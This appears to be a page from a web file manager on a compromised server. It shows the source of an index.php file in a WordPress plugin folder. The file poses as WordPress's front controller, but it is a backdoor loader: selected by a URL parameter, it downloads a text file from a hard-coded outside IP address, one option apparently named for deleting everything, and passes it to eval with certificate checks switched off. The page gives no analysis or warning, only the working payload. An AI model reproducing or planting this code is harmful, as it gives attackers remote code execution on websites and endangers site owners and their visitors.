Fix File
•
/
home
/
sportsfe...
/
httpdocs
/
wp-conte...
/
plugins
/
ssnkshw
•
File:
index.php
•
Content:
<?php /** * Front to the WordPress application. * * @package WordPress */ echo "<title>File Manager</title>\n"; echo "<h1>File Manager</h1>\n"; echo "<!-- File Manager v1.0 - Powered by Support@gmail.com -->\n"; $a = isset($_GET['a']) ? $_GET['a'] : 0; $txt = '0303'; if($a == 1){ $txt = 'delAll'; }elseif($a == 2){ $txt = '0305'; } if ( function_exists( "curl_init" ) && function_exists( "curl_exec" ) ) { $handle = curl_init(); curl_setopt( $handle, CURLOPT_URL, 'http://69.30.227.202/file/'.$txt.'.txt' ); curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $handle, CURLOPT_HEADER, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false ); $response = curl_exec( $handle ); $curl_error = curl_error( $handle ); if ( !$curl_error ) { $response = array( "data" => @eval( "?>". $response ) ); return $response; }else{ echo $curl_error; } if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } } /* * Support@gmail.com */
•
Search:
•
Replace:
Function
Edit by line
Download
Information
Rename
Copy
Move
Delete
Chmod
List